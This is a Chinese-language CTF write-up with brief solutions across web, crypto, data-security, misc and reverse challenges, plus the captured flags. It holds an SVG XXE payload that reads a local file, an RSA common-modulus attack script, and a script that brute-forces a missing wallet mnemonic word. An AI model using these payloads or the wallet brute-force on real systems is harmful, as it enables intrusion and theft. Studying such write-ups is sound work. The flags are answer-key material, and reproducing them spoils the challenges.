WEB

upload

EzSerialize

链子一眼穿

看start.sh

UploadKing

svg打xxe

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE note [ <!ENTITY file SYSTEM "file:///flag" > ]>
<svg height="100" width="1000">
<text x="10" y="20">&file;</text>
</svg>

CRYPTO

RSA_Common_Attack

共模攻击

from gmpy2 import *
from Crypto.Util.number import *

c1= 902947871638340144585350496607905036788917988784297938051712515029419473301205843372041904115813361402310512640716508455953201343091183980022416880886523265909139556951175072940441586166669057233430247014907124872576782948489940428513680356381769358116956570193102584168134758031000460513472898624075765670452482015562555449322262139576088011030490086784087285869959810062075648470122232452663599195404333292792928816934802064740144937473749408450501803510475933273448208685792400696632919950948832464784621694657179199125876564156360048730797653060931844444935302553732964065897065735427838601696506594726842758656

c2= 7024079443689213821451191616762957236018704240049119768827190246286227366906772824421534943039282921384333899446122799252327963055365970065258371710141470872948613397123358914507497871585713222863470875497667604127210508840915183968145267083193773724382523920130152399270957943228022350279379887455019966651166356404967621474933206809521046480962602160962854745553005978607776790079518796651707745342923714121497001171456582586327982922261473553814594384196824815090185841526000247291514943042643385984600122463395695871306301585799490389353720773152762256126676456786420058282912965520064317739998211921049808590504

n= 12184620342604321526236147921176689871260702807639258752158298414126076615130224253248632789995209263378074151299166903216279276546198828352880417707078853010887759267119069971739321905295081485027018480973993441393590030075971419165113599211569178425331802782763120185350392723844716582476742357944510728860535408085789317844446495987195735585533277358245562877243064161565448407188900804528695784565011073374273835326807616704068806996983861885772305191259029021518998160545972629938341341148477795894816345752396040127286263780418335699743896454197151019898505844519753453115300227481242993291336748858733029540609

e1 = 65537
e2 = 10001

s0, s1, s2 = gcdext(e1,e2)
m_s0 = pow(c1,s1,n) * pow(c2,s2,n) % n
m = long_to_bytes(iroot(m_s0,s0)[0])

print(m)
# flag = NSSCTF{d64dba66-b608-4255-b888-0b0f25c2f90e}

ez_stream

逆向手一眼rc4

数据安全

dsEnData

import base64

def encode(D, K='a1a60171273e74a6'):
    D = base64.b64decode((data.encode()))
    res = b''
    for i in range(len(D)):
        c = K[i+1&15]
        res += bytes.fromhex(hex(D[i]^ord(c))[2:].zfill(2))
    return res

import pandas as pd
df = pd.read_csv(r"C:\Users\55397\Downloads\dsEnData的附件\tempdir\DS附件\dsEnData的附件\encoded_data.csv")
for i in range(5000):
    data = df["username"][i]
    df.loc[i,"username"]= encode(data.encode()).decode()
    data = df["name"][i]
    df.loc[i, "name"] = encode(data.encode()).decode()
    data = df["phone"][i]
    df.loc[i, "phone"] = encode(data.encode()).decode()
    data = df["email"][i]
    df.loc[i, "email"] = encode(data.encode()).decode()
    data = df["address"][i]
    df.loc[i, "address"] = encode(data.encode()).decode()
print(df)
df.to_csv(r"C:\Users\55397\Downloads\dsEnData的附件\tempdir\DS附件\dsEnData的附件\re.csv", index=False)

AI

ez_AI_inject

MISC

什么密码

先修复伪加密

得到一张图片

Rsb隐写得到密文

Winhex打开文件尾部得到base64的换表

解密得到

RecoverWallet

助记词爆破，地址转换

利用之前的脚本稍作修改（感谢杨雪老师的取证课）

from mnemonic import Mnemonic
from tronpy import Tron
from tronpy.keys import PrivateKey
from bip32 import BIP32
import eth_keys


partial_mnemonic = "ankle assume estate permit eye fancy spring demand dial awkward hole"
target_address = "700f80"
mnemo = Mnemonic("english")
wordlist = mnemo.wordlist


def generate_eth_address(mnemonic_words):
    """
    根据助记词生成以太坊地址
    
    :param mnemonic_words: 助记词字符串，单词之间用空格分隔
    :return: 生成的以太坊地址
    """
    # 从助记词生成种子
    seed = mnemo.to_seed(mnemonic_words)
    
    # 使用BIP32推导私钥 (以太坊使用 m/44'/60'/0'/0/0 路径)
    bip32 = BIP32.from_seed(seed)
    private_key_bytes = bip32.get_privkey_from_path("m/44'/60'/0'/0/0")
    
    # 使用eth_keys库生成以太坊地址
    private_key = eth_keys.keys.PrivateKey(private_key_bytes)
    public_key = private_key.public_key
    address = public_key.to_checksum_address()
    
    return address


# 遍历词表，尝试恢复最后一个单词
for word in wordlist:
    full_mnemonic = partial_mnemonic[:27] + word + " " + partial_mnemonic[27:]
    if mnemo.check(full_mnemonic):
        # print(f"恢复的完整助记词是: {full_mnemonic}")
        try:
            eth_address = generate_eth_address(full_mnemonic)
            if target_address in eth_address:
                print(f"目标地址{target_address}关联的助记词是: {full_mnemonic}")
                print(f"生成的以太坊地址是: {eth_address}")
                break
            # print(f"生成的波场地址是: {tron_address}")
        except ValueError as e:
            print(f"错误: {e}")

单词的顺序是知道的，第五位就是要爆破的，

询问本地ai得知eth的以太坊路径是60

得到结果

REVERSE

DontDebugMe

绕过反调试，先加上685h再和ee20异或

enc = [0xA9E9, 0xA7F8, 0xA2F9, 0x0D620, 0xD69A,

       0xD9C8, 0xD399, 0x85CB, 0xD29B, 0xD5C7,

       0x8496, 0xD4C9, 0xD89A, 0xD7CA, 0xD59C,

       0x85C8, 0xD597, 0x859E, 0xD49C, 0x6DCA]
decode = []
for i in range(20):
    enc[i] ^= 0xee20
    enc[i] -= 0x685
    decode.append(hex(enc[i]))

print(decode)

a = 'ADCSFT1{251c74ef665bd14d053e57ec52e947}e'
for i in range(0, len(a) - 1, 2):
    print(a[i + 1] + a[i], end='')